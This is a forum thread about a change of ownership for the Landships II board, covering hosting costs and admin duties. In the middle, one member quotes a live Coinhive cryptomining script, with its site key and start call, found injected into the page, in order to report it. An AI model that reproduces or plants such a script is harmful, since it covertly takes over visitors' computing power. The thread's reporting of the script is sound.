Change of Ownership Request
Permalink

Dear Landships II Community

I'm Rob with SparkLIT, the makers of the ActiveBoard software that this community is built upon.

As you may be aware, this community has had no active ownership for quite some time due to unforeseen circumstances.  We'd certainly hate to shut down an active forum such as this one, so we are looking for the community's input on who they would like to see assume control of this forum.

You may reply to this topic if you have any questions, if you'd like to submit your name to be reviewed, or if you have a recommendation of a user that we may reach out to and determine if they're interested in taking over management of this site.

We appreciate your patience while we seek to find a responsible, reliable owner that will continue to oversee this community.

Thank you for your time,

Robert,
Customer Support Lead

I hope its okay, but I reposted this statement on the papermodelers.com forum.
We have many members who regualrly visit and contribute to this site.
We would also hate to see it go.
Dave

What is all involved in the change of ownership request? By this question I mean to ask what are the duties of an administrator if they take over the site?

Maybe ActiveBoard would like to remove the data mining program that keeps triggering out anti-virus software?

 No you haven't - on lines 1626-1630 of this forum page:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>

<script>

var miner = new CoinHive.Anonymous('JntxuNWNVvu7sGkUjCDHArA2r1TUTv8t',{threads: 1, throttle: 0.30});

miner.start();

</script>

This may be a new definition of "removed" in the IT world that I haven't caught up with yet...

Those two threads have been cleaned up and the offenders banned. Thanks, Charlie and pzkpfwe. Any others?

 Anyone can pm me if that's your preference.

 I have that same question. I have no idea what to expect.

Is there someone who can explain .....?

I also have no idea what is involved. Probably it is also interesting if it is possible to share the responsibility amongst a team?

I also need to understand what is required. Can someone explain, please?

A team sounds a good idea.

Since there are quite a few of us on different time zones, a team effort sounds more doable. Maybe SparkLIT

can let us know what is all involved in maintaining this website.

I think what Sparklit are after is for someone to take over the site as Site Owner

and therfore the responsibility for paying the bills, not just Admin and Moderation...

I dont know if theres anyway to do that by comity, maybe its possible to have more then one registered site owner?

But its probably not viable unless its something like a club... if then.

I dont know what the costs involved are but the numbers of visitors (probably mostly search engines or bots) is

in the region of 1000+ per day.... I would think pageviews and advertising will determine the cost...

But I have no idea what the normal traffic for the site is...

Sorry about the the rather poot text, but the site format is awfull for me at the moment...

far too wide window by about 50%

Sparklit also offer a free forum (forae? forums?) supported by advertising. I think that's what the Landships forum has been

running on for ages. To quote from their website:

"We also offer a free forum account that gives you

Unlimited forums

Advertising supported

Unlimited users, threads, and posts"

Regards,

Charlie

"Sparklit also offer a free forum"

If it works fine, I dont see any adds but I doubt thats normal for a free forum...

Are we on a free site ? or did the previous owner pay to have Landships going ?

There was certainly payments involved I think to get rid of adds but may also have been for excess pageviews/bandwidth... there was a donation option for this but that didnt seem to work well and turned into rather a lot owed...

If you want a free forum with no overheads then I think it will mean having adds and IMO I think for a public forum it would be the way to go, but I dont know how this will impact the forum overall, it depends how in your face they are and how many.... adds only work as a method of supporting the forum though if visitors dont use add blockers!

wink

 We aren't on a site, we are on a forum. This forum and the Landships II site are separate entities. The LII site is not free, it is paid for by the sponsors. The site links to this forum (and vice versa) which is also not free, but currently the costs are borne by Sparklit. There would be costs involved with accepting ownership of this forum unless the free option is chosen. All I know about the free option is that it carries advertisements and we currently don't have it.

Sparklit have said they are in no hurry to find an owner. They probably said that because this forum is successful (by some standards); there isn't much spam, there are no flame wars, foul language, and etc.

I guess the question becomes; does one person want to pay for an ad-free forum (and possibly then everybody could pay that person), or does the community want the free version.

Previously, Peter Kempf paid for the Landships site and the Landships forum. I remember there was an option to contribute to the costs of running the forum. It seems to me, the forum cost more than the sum of the contributions. We lost contact with Peter Kempf some years ago.

I have found a well of knowledge that i dip my fingers in here..

But it is also about legal questions I guess, in terms of copyright violations and the responsibility for such, right?

PDA is right, we're in no hurry, at the moment, I've transferred ownership of the account to my own profile, so we're just fronting the costs ourselves because we didn't want to see the community dwindle away.

When a new owner is found, there are community funding options we provide (basically we given an option for people to donate directly to the forum's balance so that the monthly fee comes out of the donation fund).

Again, we're not in any rush.

The new owner would become responsible for assuming the monthly bill, managing the community and it's content etc.

We'll get there! In the meantime, PDA is a full administrator and has been handling things like spammers and such, so we are very appreciative of your work!

and how big is this "monthly bill"?

Thanks,

By our pricing structure, we offer a forum that handles 100,000 page views a month for $6.40 a month and 250,000 page views per month for $17.98 per month. Currently this community sees roughly 150,000 page views per months, so it sort of falls in the middle, though I'd likely offer the new owner the larger plan ($17.98) per month at a very discounted rate, solely for the fact that it wasn't their original community and they've stepped up to the plate to help out. That'll be discussed with whomever expresses interest in taking over.

Gentlemen,
If we are to keep this forum going then we need somebody that has the knowledge to run it and is willing to pay the monthly fee with the help from the members of the forum in someway!
